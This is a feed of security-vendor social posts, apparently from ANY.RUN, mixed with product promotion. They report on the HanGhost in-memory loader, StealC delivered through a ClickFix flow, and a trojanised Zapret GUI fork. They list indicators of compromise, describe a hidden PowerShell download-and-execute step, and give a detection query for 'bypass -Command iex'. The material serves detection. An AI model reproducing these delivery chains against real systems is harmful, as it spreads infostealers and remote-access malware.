🚨 Update Your Detection Rules: New In-Memory Loader

We caught a highly evasive #HanGhost loader, designed to bypass traditional detection through layered obfuscation and in-memory execution. This activity targets corporate users handling payments, logistics, and contract workflows, expanding exposure across critical operations.

⚠️ The delivery chain combines obfuscated JavaScript, hidden PowerShell execution, and environment-variable staging.

In the second stage, the loader retrieves an image file and extracts an encrypted payload embedded at the end of the file, combining steganography with in-memory loading and making detection significantly harder ❗️

👾 The loader is used to deliver multiple malware families: #PureHVNC, #XWorm, #Meduza, #AgentTesla, and #Phantom, with some chains also deploying #UltraVNC, extending the impact from initial access to persistent remote control.

⚡️#ANYRUN Sandbox allows analysts to reconstruct the full execution chain, helping confirm complex multi-stage activity earlier and reduce MTTR.

🔗 JavaScript-to-Payload execution chain:

JS ➡️ PowerShell ➡️ in-memory .NET assembly ➡️ PNG payload ➡️ Malware

📈 The campaign shows wave-based activity, indicating ongoing development and scaling:

March 26 — early cluster

April 1–2 — first large multi-family wave

April 3 — focused wave (PureHVNC / AgentTesla / Phantom)

April 6 — PureHVNC-heavy activity

April 7 — new peak with split between PureHVNC and XWorm/Meduza clusters

April 8 — multi-family wave (PureHVNC / Phantom / AgentTesla)

April 9–13 — more focused wave dominated by PureHVNC, with Phantom, DarkCloud, Formbook, and Meduza also present

👨‍💻 See the analysis session and collect #IOCs to speed up detection and response: https://app.any.run/tasks/cc26155e-e8e9-442b-b000-8d1a1435e7db?utm_source=mastodon&utm_medium=post&utm_campaign=hanghost&utm_content=linktoservice&utm_term=130426

🔍 Use this TI Lookup query to pivot from IOCs, review related activity, and validate your detection coverage: https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=hanghost&utm_content=linktotilookup&utm_term=130426#%7B%2522query%2522:%2522commandLine:%255C%2522bYPaSS%2520-Command%2520*iex%2520$env:%255C%2522%2522,%2522dateRange%2522:180%7D%20

👨‍💻 Equip your SOC with faster decisions and lower workload. See how #ANYRUN fits your workflows: https://any.run/enterprise/?utm_source=mastodon&utm_medium=post&utm_campaign=hanghost&utm_content=linktoenterprise&utm_term=130426

#cybersecurity #infosec

❗️ MSSP growth brings higher alert volume and stricter SLAs.

Unifying detection, enrichment, and reporting with #ANYRUN helps teams support more clients while keeping service quality consistent ⚡️

Explore how #ANYRUN strengthens MSSP growth at scale: https://any.run/mssp/?utm_source=mastodon&utm_medium=post&utm_campaign=mssp_growth&utm_term=080426&utm_content=linktomssplanding

⏳ Every minute without execution context increases dwell time and business risk.

Integrate #ANYRUN into your current stack to reduce MTTR by 21 min per case and cut Tier 1 workload by up to 20%.

⚡️ Close the gap between detection and decision-making: https://any.run/integrations/?utm_source=mastodon&utm_medium=post&utm_campaign=all_integrations_connectors&utm_term=070426&utm_content=linktointegrations

⚠️ Encrypted HTTPS traffic remains one of the main reasons #phishing is harder to confirm quickly. Automatic SSL decryption significantly expands visibility in every #ANYRUN Sandbox session. See real-world examples:
🔹 #EvilTokens. Decrypted traffic exposed hidden HTTPS API calls behind the OAuth Device Code phishing flow, revealing session control and attacker infrastructure: https://app.any.run/tasks/2e8014a8-a90a-41bf-90fa-aa65da40fd20/?utm_source=mastodon&utm_medium=post&utm_campaign=ssl_decryption_examples&utm_term=020426&utm_content=linktoservice

🔹#FlowerStorm. SSL decryption enabled early detection of this phishkit via POST requests to /google.php at initial page load, before any user interaction or data entry: https://app.any.run/tasks/25694db7-2771-480c-9ff0-773e399331d6/?utm_source=mastodon&utm_medium=post&utm_campaign=ssl_decryption_examples&utm_term=020426&utm_content=linktoservice

🔹 Phishing via Telegram API. Decrypted traffic revealed data exfiltration through the Telegram Bot API, helping identify localized campaigns via encrypted traffic patterns: https://app.any.run/tasks/49484bb5-28ec-44ca-835a-9b3235bd6419/?utm_source=mastodon&utm_medium=post&utm_campaign=ssl_decryption_examples&utm_term=020426&utm_content=linktoservice

⚡️ Reduce phishing risk across your organization. Integrate #ANYRUN into your SOC’s triage & response workflows: https://any.run/enterprise/?utm_source=mastodon&utm_medium=post&utm_campaign=ssl_decryption_examples&utm_term=020426&utm_content=linktoenterpriselanding

#cybersecurity #infosec

🚑 Limited context during analysis slowed triage and response at Health Shared Services, a healthcare organization supporting 130K+ endpoints

⚡️ See how #ANYRUN changed their SOC workflow and allowed analysts to handle real threats with lower MTTR/MTTD: https://any.run/cybersecurity-blog/healthcare-success-story/?utm_source=mastodon&utm_medium=post&utm_campaign=healthcare_success_story&utm_term=020426&utm_content=linktoblog

⚠️ #𝗦𝘁𝗲𝗮𝗹𝗖 𝗶𝘀 𝗻𝗼𝘄 𝗱𝗲𝗹𝗶𝘃𝗲𝗿𝗲𝗱 𝘃𝗶𝗮 𝗮 𝗖𝗹𝗼𝘂𝗱𝗳𝗹𝗮𝗿𝗲 𝗖𝗹𝗶𝗰𝗸𝗙𝗶𝘅 𝗳𝗹𝗼𝘄, masking malicious activity behind trusted services. Behavioral analysis exposed a PowerShell-based execution chain used to download and run the payload while attempting to evade detection.

👾 The Process Tree reveals the payload chain: powershell.exe ➡️ powershell.exe ➡️ y3gag2iu.3wq.exe (StealC 🚨)

Multi-stage PowerShell execution and hidden payload delivery make early confirmation harder, slowing triage. #ANYRUN Sandbox helps analysts quickly validate the attack and reduce investigation time.

👨‍💻 See the analysis session and collect #IOCs to speed up detection and response: https://app.any.run/tasks/48e6b68d-dfa2-423e-8e7c-24cf8a6ef85b/?utm_source=mastodon&utm_medium=post&utm_campaign=cloudflare_clickfix&utm_term=010426&utm_content=linktoservice

⚡️ Learn how #ANYRUN helps SOCs detect complex threats and contain incidents faster: https://any.run/features/?utm_source=mastodon&utm_medium=post&utm_campaign=cloudflare_clickfix&utm_term=010426&utm_content=linktosandboxlanding

⚙️ Technical details:
ClickFix flow on diddyparty[.]click triggers PowerShell via Win+X ➡️ I. A hidden command (-NoProfile -WindowStyle Hidden) enforces TLS 1.2, stages a random EXE in %TEMP%, pulls the payload via Invoke-WebRequest, executes it, and attempts cleanup. Full execution details are available in the Script Tracer tab.

🔍 IOCs:
diddyparty[.]click
3f0fe92c0e1c4663dcb851ce0fc97ddaed25b559be1d6e2cc0f66304ac652e38

#cybersecurity #infosec

🔥 Big March updates at #ANYRUN!

What's new:
🔹 Stronger phishing detection with automatic SSL decryption
🔹 Fewer blind spots with macOS & Windows Server VMs
🔹 Expanded threat coverage with new detections, rules, and TI reports

Learn more👇
https://any.run/cybersecurity-blog/release-notes-march-2026/?utm_source=mastodon&utm_medium=post&utm_campaign=release_notes_march_2026&utm_term=310326&utm_content=linktoblog

Hope you found #RSAC2026 valuable. We definitely did 🚀

🏆 Honored to receive two Global InfoSec Awards, highlighting the impact #ANYRUN brings to enterprise SOCs & MSSPs.

Great to connect with partners and customers 🙌
Explore our RSAC takeaways: https://any.run/cybersecurity-blog/rsac-2026-highlights/?utm_source=mastodon&utm_medium=post&utm_campaign=rsac_2026&utm_term=300326&utm_content=linktoblog

GUI ценой приватности: разбор вредоносного форка Zapret 2 GUI

Из за замедления YouTube, Discord и других популярных сервисов в РФ спровоцировало настоящий бум инструментов для обхода DPI. Флагманский проект zapret от @bol-van - мощное решение, но его консольный интерфейс пугает рядового пользователя. На этой почве выросли десятки GUI-оболочек «для домохозяек».. Однако за красивым интерфейсом и обещанием «обхода в один клик» может скрываться нечто большее, чем просто прокси-клиент. В этой статье я разберу форк «Zapret 2 GUI» (автор censorliber), который набрал сотни звезд на GitHub, но при детальном анализе оказался полноценным инструментом для шпионажа и компрометации системы..

https://habr.com/ru/articles/1015380/?utm_source=habrahabr&utm_medium=rss&utm_campaign=1015380

#zapret #обход_блокировок #dpi #malware #trojan #mitm #аудит_кода #ANYRUN #reverse_engineering

GUI ценой приватности: разбор вредоносного форка Zapret 2 GUI

Из за замедления YouTube, Discord и других популярных сервисов в РФ спровоцировало настоящий бум инструментов для обхода DPI. Флагманский проект zapret от @bol-van - мощное решение, но его консольный интерфейс пугает рядового пользователя. На этой почве выросли десятки GUI-оболочек «для домохозяек».. Однако за красивым интерфейсом и обещанием «обхода в один клик» может скрываться нечто большее, чем просто прокси-клиент. В этой статье я разберу форк «Zapret 2 GUI» (автор censorliber), который набрал сотни звезд на GitHub, но при детальном анализе оказался полноценным инструментом для шпионажа и компрометации системы..

https://habr.com/ru/articles/1015380/

#zapret #обход_блокировок #dpi #malware #trojan #mitm #аудит_кода #ANYRUN #reverse_engineering